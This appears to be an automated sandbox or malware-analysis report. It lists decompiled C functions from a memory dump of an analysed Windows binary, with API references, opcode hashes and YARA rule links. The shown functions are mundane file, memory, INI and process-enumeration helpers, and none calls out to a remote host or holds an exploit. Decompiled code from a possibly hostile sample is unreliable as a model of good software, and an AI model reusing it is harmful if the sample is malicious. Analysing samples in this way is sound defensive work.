                                                                                                                                                      C-Code - Quality: 57%
                                                                                                                                                      			E004096FE(intOrPtr* __eax, void* __edx, void* __eflags, short* _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* _t24;
				intOrPtr _t34;
				void* _t42;
				void* _t44;
				void* _t51;
				signed int _t54;
				intOrPtr* _t58;
				void* _t62;

				_t62 = __eflags;
				_t51 = __edx;
				_push(_t44);
				_push(_t44);
				_t54 = 0;
				_t58 = __eax;
				_v8 = 0;
				E0040951A(__eax, _a8);
				E00407A66(_t58, _t62);
				_t23 = _a4;
				if( *_a4 == 0) {
					_t24 = GetStdHandle(0xfffffff5);
				} else {
					_t24 = E00405351(_t23);
					_pop(_t44);
				}
				_t42 = _t24;
				if(_t42 == 0xffffffff) {
					__eflags = 0;
					E004053B1(0, 0, _t54);
				} else {
					if( *((intOrPtr*)(_t58 + 0x24)) != _t54) {
						if( *((intOrPtr*)(_t58 + 0x28)) == _t54) {
							_push(2);
							_push(0x40ff4c);
						} else {
							_push(3);
							_push(0x40ff48);
						}
						_push(_t42); // executed
						E00405E62(_t44); // executed
					}
					_v8 = 1;
					E0040528C();
					E00409C22(_t58, _t51, _t42, _a8); // executed
					if( *((intOrPtr*)(_t58 + 0x3c)) > _t54) {
						do {
							_t34 = E00407588(_t58, _t54);
							_push(_t34);
							_v12 = _t34;
							if( *((intOrPtr*)( *_t58 + 0x30))() == 0) {
								goto L12;
							} else {
								_push(_a8);
								_push(_v12);
								_push(_t42); // executed
								if( *((intOrPtr*)( *_t58 + 0x84))() == 0) {
									_v8 = _v8 & 0x00000000;
									__eflags = 0;
									E004053B1(0, 0, 0);
								} else {
									goto L12;
								}
							}
							goto L15;
							L12:
							_t54 = _t54 + 1;
						} while (_t54 <  *((intOrPtr*)(_t58 + 0x3c)));
					}
					L15:
					E00409BE4(_a8, _t58, _t42);
					if( *_a4 != 0) {
						FindCloseChangeNotification(_t42); // executed
					}
					E004052A6();
				}
				return _v8;
			}

















                                                                                                                                                      0x004096fe
                                                                                                                                                      0x004096fe
                                                                                                                                                      0x00409701
                                                                                                                                                      0x00409702
                                                                                                                                                      0x00409709
                                                                                                                                                      0x0040970b
                                                                                                                                                      0x0040970d
                                                                                                                                                      0x00409710
                                                                                                                                                      0x00409717
                                                                                                                                                      0x0040971c
                                                                                                                                                      0x00409722
                                                                                                                                                      0x0040972f
                                                                                                                                                      0x00409724
                                                                                                                                                      0x00409725
                                                                                                                                                      0x0040972a
                                                                                                                                                      0x0040972a
                                                                                                                                                      0x00409735
                                                                                                                                                      0x0040973a
                                                                                                                                                      0x004097e0
                                                                                                                                                      0x004097e2
                                                                                                                                                      0x00409740
                                                                                                                                                      0x00409743
                                                                                                                                                      0x00409748
                                                                                                                                                      0x00409753
                                                                                                                                                      0x00409755
                                                                                                                                                      0x0040974a
                                                                                                                                                      0x0040974a
                                                                                                                                                      0x0040974c
                                                                                                                                                      0x0040974c
                                                                                                                                                      0x0040975a
                                                                                                                                                      0x0040975b
                                                                                                                                                      0x00409760
                                                                                                                                                      0x00409763
                                                                                                                                                      0x0040976a
                                                                                                                                                      0x00409775
                                                                                                                                                      0x0040977d
                                                                                                                                                      0x0040977f
                                                                                                                                                      0x00409780
                                                                                                                                                      0x00409787
                                                                                                                                                      0x0040978a
                                                                                                                                                      0x00409792
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00409794
                                                                                                                                                      0x00409794
                                                                                                                                                      0x00409799
                                                                                                                                                      0x0040979e
                                                                                                                                                      0x004097a7
                                                                                                                                                      0x004097b1
                                                                                                                                                      0x004097b7
                                                                                                                                                      0x004097b9
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004097a7
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004097a9
                                                                                                                                                      0x004097a9
                                                                                                                                                      0x004097aa
                                                                                                                                                      0x004097af
                                                                                                                                                      0x004097bf
                                                                                                                                                      0x004097c3
                                                                                                                                                      0x004097cf
                                                                                                                                                      0x004097d2
                                                                                                                                                      0x004097d2
                                                                                                                                                      0x004097d8
                                                                                                                                                      0x004097d8
                                                                                                                                                      0x004097ef

                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00407A66: ??2@YAPAXI@Z.MSVCRT ref: 00407A87
                                                                                                                                                        • Part of subcall function 00407A66: ??3@YAXPAX@Z.MSVCRT ref: 00407B4E
                                                                                                                                                      • GetStdHandle.KERNEL32(000000F5,?,?,00000000,00000002,?,?,00000001,0040BE1B,0040F454,00000000,00000000,00000000,00000000,74784E00,?), ref: 0040972F
                                                                                                                                                      • FindCloseChangeNotification.KERNELBASE(00000000,00000000,00000000,?,?,?,00000001,0040BE1B,0040F454,00000000,00000000,00000000,00000000,74784E00,?), ref: 004097D2
                                                                                                                                                        • Part of subcall function 00405351: CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0040972A,?,?,?,00000000,00000002,?,?,00000001), ref: 00405363
                                                                                                                                                        • Part of subcall function 004053B1: GetLastError.KERNEL32(00000000,?,004097E7,00000000,?,?,00000001,0040BE1B,0040F454,00000000,00000000,00000000,00000000,74784E00,?), ref: 004053C5
                                                                                                                                                        • Part of subcall function 004053B1: _snwprintf.MSVCRT ref: 004053F2
                                                                                                                                                        • Part of subcall function 004053B1: MessageBoxW.USER32(?,?,Error,00000030), ref: 0040540B
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ??2@??3@ChangeCloseCreateErrorFileFindHandleLastMessageNotification_snwprintf
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1161345128-0
                                                                                                                                                      • Opcode ID: 1f12c5174dbf626df3c53de546eeba79fd62534e1c6cb3d42b78c857b20e2863
                                                                                                                                                      • Instruction ID: 16bf936c0797f0b5653ba44e3a68d79ed8c61ea338f92f09e3d7ddd4fa5d63e9
                                                                                                                                                      • Opcode Fuzzy Hash: 1f12c5174dbf626df3c53de546eeba79fd62534e1c6cb3d42b78c857b20e2863
                                                                                                                                                      • Instruction Fuzzy Hash: ED218F32610200EBCB24AF66CC85A5F77A8EF44764F24853BF806B72C3DA7C9D418A59
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 00404689, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 60COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E00404689(void** __ecx, void* __eflags, intOrPtr _a4, void* _a8) {
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				void* __edi;
				void* __esi;
				intOrPtr _t25;
				void* _t28;
				void** _t29;
				void* _t34;
				intOrPtr _t37;
				void* _t38;

				_t30 = __ecx;
				_v16 = _v16 & 0x00000000;
				_v12 = _v12 & 0x00000000;
				_t29 = __ecx;
				_v8 = 0x1388;
				E00406729( *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x418)) + 0xec)),  &_v16);
				_t34 = _v16;
				if(E00404070(_t29, _t34, _a4) == 0) {
					_t37 = 0;
				} else {
					_t38 = _a8;
					if( *(_t34 + 0x24) != 1) {
						L6:
						__eflags =  *(_t34 + 0x24) & 0x00000004;
						if(( *(_t34 + 0x24) & 0x00000004) != 0) {
							_t25 = E0040460C(_t30, _t29, _t34, _t38); // executed
							goto L4;
						} else {
							memcpy(_t38, _t34,  *( *((intOrPtr*)(_t29 + 0x418)) + 0xec));
							_t37 = _a4;
						}
					} else {
						_t28 = E0040460C(_t30, _t29, _t34, _t38);
						_t44 = _t28;
						if(_t28 == 0) {
							goto L6;
						} else {
							_t25 = E00404689(_t29, _t44, _t28, _t38);
							L4:
							_t37 = _t25;
						}
					}
				}
				E00406710( &_v16);
				return _t37;
			}














                                                                                                                                                      0x00404689
                                                                                                                                                      0x0040468f
                                                                                                                                                      0x00404693
                                                                                                                                                      0x00404699
                                                                                                                                                      0x004046ab
                                                                                                                                                      0x004046b2
                                                                                                                                                      0x004046ba
                                                                                                                                                      0x004046c7
                                                                                                                                                      0x00404725
                                                                                                                                                      0x004046c9
                                                                                                                                                      0x004046cd
                                                                                                                                                      0x004046d0
                                                                                                                                                      0x004046fa
                                                                                                                                                      0x004046fa
                                                                                                                                                      0x004046fe
                                                                                                                                                      0x0040471e
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00404700
                                                                                                                                                      0x0040470e
                                                                                                                                                      0x00404713
                                                                                                                                                      0x00404716
                                                                                                                                                      0x004046d2
                                                                                                                                                      0x004046d5
                                                                                                                                                      0x004046da
                                                                                                                                                      0x004046dc
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004046de
                                                                                                                                                      0x004046e2
                                                                                                                                                      0x004046e7
                                                                                                                                                      0x004046e7
                                                                                                                                                      0x004046e7
                                                                                                                                                      0x004046dc
                                                                                                                                                      0x004046d0
                                                                                                                                                      0x004046ec
                                                                                                                                                      0x004046f7

                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00406729: ??3@YAXPAX@Z.MSVCRT ref: 00406730
                                                                                                                                                        • Part of subcall function 00406729: ??2@YAPAXI@Z.MSVCRT ref: 0040673E
                                                                                                                                                        • Part of subcall function 00404070: SetFilePointerEx.KERNELBASE(F@@,?,?,00000000,00000000,00000000,004046C5,00000000,00000000,?,00000000,F@@), ref: 0040408C
                                                                                                                                                      • memcpy.MSVCRT ref: 0040470E
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ??2@??3@FilePointermemcpy
                                                                                                                                                      • String ID: F@@
                                                                                                                                                      • API String ID: 402491248-234039029
                                                                                                                                                      • Opcode ID: a2a877243d3c89850b15c365e55990fc21c52ff07033efc540406eb1b4e16218
                                                                                                                                                      • Instruction ID: c3572d9dbfcd3884a1c52f4e364fbd30e8829f125a260a26c36de24cb81dc24a
                                                                                                                                                      • Opcode Fuzzy Hash: a2a877243d3c89850b15c365e55990fc21c52ff07033efc540406eb1b4e16218
                                                                                                                                                      • Instruction Fuzzy Hash: 9211C4B2900114B7DB109B968844F9FBBAC9F86358F05847ABE0677282D67DA905C7EC
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 0040536A, Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E0040536A(void* _a4, void* _a8) {
				long _v8;
				int _t8;

				_t8 = WriteFile(_a4, _a8, wcslen(_a8) + _t6,  &_v8, 0); // executed
				return _t8;
			}





                                                                                                                                                      0x00405386
                                                                                                                                                      0x0040538d

                                                                                                                                                      APIs
                                                                                                                                                      • wcslen.MSVCRT ref: 00405377
                                                                                                                                                      • WriteFile.KERNELBASE(?,00000003,00000000,00000001,00000000,?,?,00408878,?,00000003,?,00409C9C,?,[,?,0040977A), ref: 00405386
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FileWritewcslen
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3657313286-0
                                                                                                                                                      • Opcode ID: 9602672fe1690bd860651872230ab81ccb290f1b65c84329dc0bcfd5fae289e8
                                                                                                                                                      • Instruction ID: 0c605581e95f6f9092e1dff17d412b80520820f1d5211188770866c3677ad8a7
                                                                                                                                                      • Opcode Fuzzy Hash: 9602672fe1690bd860651872230ab81ccb290f1b65c84329dc0bcfd5fae289e8
                                                                                                                                                      • Instruction Fuzzy Hash: 19D09271100108BFEB119B51EC06EA93BADEB00268F108035B904981A1DAB6AE559B64
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 00406729, Relevance: 3.0, APIs: 2, Instructions: 16COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 80%
                                                                                                                                                      			E00406729(signed int __edi, signed int* __esi) {
				signed int _t4;
				signed int _t9;
				signed int* _t10;

				_t10 = __esi;
				_t9 = __edi;
				_t4 =  *__esi;
				if(_t4 != 0) {
					_push(_t4);
					L0040E032();
					 *__esi =  *__esi & 0x00000000;
					__esi[1] = __esi[1] & 0x00000000;
				}
				_push(_t9); // executed
				L0040E038(); // executed
				 *_t10 = _t4;
				_t10[1] = _t9;
				return 1;
			}






                                                                                                                                                      0x00406729
                                                                                                                                                      0x00406729
                                                                                                                                                      0x00406729
                                                                                                                                                      0x0040672d
                                                                                                                                                      0x0040672f
                                                                                                                                                      0x00406730
                                                                                                                                                      0x00406735
                                                                                                                                                      0x00406738
                                                                                                                                                      0x0040673c
                                                                                                                                                      0x0040673d
                                                                                                                                                      0x0040673e
                                                                                                                                                      0x00406743
                                                                                                                                                      0x00406748
                                                                                                                                                      0x0040674c

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ??2@??3@
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1936579350-0
                                                                                                                                                      • Opcode ID: 6cf18488331c8de55bf8df2c2b0666198ccd521b8632149474be28f73699e0b4
                                                                                                                                                      • Instruction ID: c90c2ba6e28998f2d5eed0bd3ccee310cae7302d4f530886d19d51dc87062eb8
                                                                                                                                                      • Opcode Fuzzy Hash: 6cf18488331c8de55bf8df2c2b0666198ccd521b8632149474be28f73699e0b4
                                                                                                                                                      • Instruction Fuzzy Hash: 1BD052B24102008BE3309F36C401726B2E8AF20726F208C2EE0D1E20C0EBB898508B18
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 0040623E, Relevance: 2.5, APIs: 2, Instructions: 14COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E0040623E(intOrPtr* __esi) {

				free( *(__esi + 0x10)); // executed
				free( *(__esi + 0xc)); // executed
				 *((intOrPtr*)(__esi)) = 0;
				 *((intOrPtr*)(__esi + 4)) = 0;
				 *(__esi + 0xc) = 0;
				 *(__esi + 0x10) = 0;
				 *((intOrPtr*)(__esi + 0x1c)) = 0;
				 *((intOrPtr*)(__esi + 8)) = 0;
				return 0;
			}



                                                                                                                                                      0x00406241
                                                                                                                                                      0x00406249
                                                                                                                                                      0x00406252
                                                                                                                                                      0x00406254
                                                                                                                                                      0x00406257
                                                                                                                                                      0x0040625a
                                                                                                                                                      0x0040625d
                                                                                                                                                      0x00406260
                                                                                                                                                      0x00406263

                                                                                                                                                      APIs
                                                                                                                                                      • free.MSVCRT(?,004064D9,74784E00,?,00000000), ref: 00406241
                                                                                                                                                      • free.MSVCRT(?,?,004064D9,74784E00,?,00000000), ref: 00406249
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: free
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1294909896-0
                                                                                                                                                      • Opcode ID: 76f590108307dae64c078041f874814435b3e422dbb17f3958c47c4fcdcab9e9
                                                                                                                                                      • Instruction ID: 28e7de91d8c6fb9b9a7e9865330149758d7ef971e5f4142975db03b93ce30916
                                                                                                                                                      • Opcode Fuzzy Hash: 76f590108307dae64c078041f874814435b3e422dbb17f3958c47c4fcdcab9e9
                                                                                                                                                      • Instruction Fuzzy Hash: 87D042B0904B008EC7B0DF3AD401A06BBF0BB083103108D3ED0EAD2A60EB75A0149F04
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 0040D68E, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • GetPrivateProfileIntW.KERNEL32 ref: 0040D6B5
                                                                                                                                                        • Part of subcall function 0040D51E: memset.MSVCRT ref: 0040D53D
                                                                                                                                                        • Part of subcall function 0040D51E: _itow.MSVCRT ref: 0040D554
                                                                                                                                                        • Part of subcall function 0040D51E: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 0040D563
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: PrivateProfile$StringWrite_itowmemset
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 4232544981-0
                                                                                                                                                      • Opcode ID: c8bc426b99cd421d8e6c78dc9e9d0a6f713dc6b41d52eb42d39c1684d3183b59
                                                                                                                                                      • Instruction ID: 52ff98ee44e8e581f616b19192f74a8057abb6c9a5cdde8826008456e78d844a
                                                                                                                                                      • Opcode Fuzzy Hash: c8bc426b99cd421d8e6c78dc9e9d0a6f713dc6b41d52eb42d39c1684d3183b59
                                                                                                                                                      • Instruction Fuzzy Hash: E9E0B632400209BFCF126F94EC01AAA3F66FF04318F148469FD5C14561D3369574AF48
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 0040D049, Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 37%
                                                                                                                                                      			E0040D049(struct HINSTANCE__** __eax, intOrPtr _a4, intOrPtr _a8) {
				void* __esi;
				intOrPtr* _t6;
				void* _t8;
				struct HINSTANCE__** _t10;

				_t10 = __eax;
				E0040D071(__eax);
				_t1 = _t10 + 0x14; // 0x8d000001
				_t6 =  *_t1;
				if(_t6 == 0) {
					return 0;
				}
				_t8 =  *_t6(_a4, 0, _a8, 0x104); // executed
				return _t8;
			}







                                                                                                                                                      0x0040d04a
                                                                                                                                                      0x0040d04c
                                                                                                                                                      0x0040d051
                                                                                                                                                      0x0040d051
                                                                                                                                                      0x0040d057
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040d06c
                                                                                                                                                      0x0040d068
                                                                                                                                                      0x00000000

                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 0040D071: LoadLibraryW.KERNELBASE(psapi.dll,0040C7D4,0040D051,747859F0,0040CF75,?,?), ref: 0040D07C
                                                                                                                                                        • Part of subcall function 0040D071: GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 0040D090
                                                                                                                                                        • Part of subcall function 0040D071: GetProcAddress.KERNEL32(0040C7D4,EnumProcessModules), ref: 0040D09C
                                                                                                                                                        • Part of subcall function 0040D071: GetProcAddress.KERNEL32(0040C7D4,EnumProcessModulesEx), ref: 0040D0A8
                                                                                                                                                        • Part of subcall function 0040D071: GetProcAddress.KERNEL32(0040C7D4,GetModuleFileNameExW), ref: 0040D0B4
                                                                                                                                                        • Part of subcall function 0040D071: GetProcAddress.KERNEL32(0040C7D4,EnumProcesses), ref: 0040D0C0
                                                                                                                                                        • Part of subcall function 0040D071: GetProcAddress.KERNEL32(0040C7D4,GetModuleInformation), ref: 0040D0CC
                                                                                                                                                      • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,0040CF75,00000104,0040CF75,?,?), ref: 0040D068
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AddressProc$FileLibraryLoadModuleName
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3821362017-0
                                                                                                                                                      • Opcode ID: 1cf08a23b09b0d3d97ff26b013f401c3bd3ea652a3947e7a2b393679c14be32e
                                                                                                                                                      • Instruction ID: 2a72a0c1e2ab3da33e39831b93c2ef8746b4f49573bf5205cfb9ee226a22e14b
                                                                                                                                                      • Opcode Fuzzy Hash: 1cf08a23b09b0d3d97ff26b013f401c3bd3ea652a3947e7a2b393679c14be32e
                                                                                                                                                      • Instruction Fuzzy Hash: DBD02231B14300ABE330EAF08C00F4BA6D86F40B18F008C3AB189F70D0C6B4C809531A
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 00405E43, Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E00405E43(void* __ecx, void* _a4, void* _a8, long _a12) {
				long _v8;
				int _t8;

				_v8 = _v8 & 0x00000000;
				_t8 = ReadFile(_a4, _a8, _a12,  &_v8, 0); // executed
				return _t8;
			}





                                                                                                                                                      0x00405e47
                                                                                                                                                      0x00405e5a
                                                                                                                                                      0x00405e61

                                                                                                                                                      APIs
                                                                                                                                                      • ReadFile.KERNELBASE(?,?,?,00000000,00000000,?,?,0040400E,00000000,?,00000400,?,00000000,00403B9A,?), ref: 00405E5A
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FileRead
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2738559852-0
                                                                                                                                                      • Opcode ID: 010b72b188bcb63d068a0cd5cc08e11c66c185d99f429563d5beb6ad59adc6ad
                                                                                                                                                      • Instruction ID: bef0590ae594767b07390076585e3b54dba5209a2ce075fea525828f997dfdeb
                                                                                                                                                      • Opcode Fuzzy Hash: 010b72b188bcb63d068a0cd5cc08e11c66c185d99f429563d5beb6ad59adc6ad
                                                                                                                                                      • Instruction Fuzzy Hash: B7D0C93141020DFBDF01CF80DD06FDD7B7DFB04359F104064BA10A5060D7759A14AB94
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 00405E62, Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E00405E62(void* __ecx, void* _a4, void* _a8, long _a12) {
				long _v8;
				int _t8;

				_v8 = _v8 & 0x00000000;
				_t8 = WriteFile(_a4, _a8, _a12,  &_v8, 0); // executed
				return _t8;
			}





                                                                                                                                                      0x00405e66
                                                                                                                                                      0x00405e79
                                                                                                                                                      0x00405e80

                                                                                                                                                      APIs
                                                                                                                                                      • WriteFile.KERNELBASE(?,?,74784E00,00000000,00000000,?,?,00409760,00000000,0040FF4C,00000002,?,?,00000001,0040BE1B,0040F454), ref: 00405E79
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FileWrite
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3934441357-0
                                                                                                                                                      • Opcode ID: c5eb87db1ef907e83a15267b5f116f03c5c857c02999e1eac1b041104452b5ef
                                                                                                                                                      • Instruction ID: e108cc57461cd09051f83d149da4ae7cbb94a9151abf142b08e99a69ba8f508e
                                                                                                                                                      • Opcode Fuzzy Hash: c5eb87db1ef907e83a15267b5f116f03c5c857c02999e1eac1b041104452b5ef
                                                                                                                                                      • Instruction Fuzzy Hash: 9DD0C93101020DFBDF01CF80DD06FDD7B7DEB04359F104064BA00A5060C7B59A14AB54
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 00406710, Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 84%
                                                                                                                                                      			E00406710(signed int* __ecx) {
				signed int _t3;

				_t3 =  *__ecx;
				if(_t3 != 0) {
					_push(_t3); // executed
					L0040E032(); // executed
					 *__ecx =  *__ecx & 0x00000000;
					__ecx[1] = __ecx[1] & 0x00000000;
					return _t3;
				}
				return _t3;
			}




                                                                                                                                                      0x00406713
                                                                                                                                                      0x00406717
                                                                                                                                                      0x00406719
                                                                                                                                                      0x0040671a
                                                                                                                                                      0x0040671f
                                                                                                                                                      0x00406722
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00406726
                                                                                                                                                      0x00406728

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ??3@
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 613200358-0
                                                                                                                                                      • Opcode ID: 4f958886a1fed562ce50c28080d2c7fd2b1c6c9b145344d0f8520b1a11cb79c8
                                                                                                                                                      • Instruction ID: 5339db72a64abfad3c15032fde593e64a1d815d69f9877ad78659c6e85a1ca85
                                                                                                                                                      • Opcode Fuzzy Hash: 4f958886a1fed562ce50c28080d2c7fd2b1c6c9b145344d0f8520b1a11cb79c8
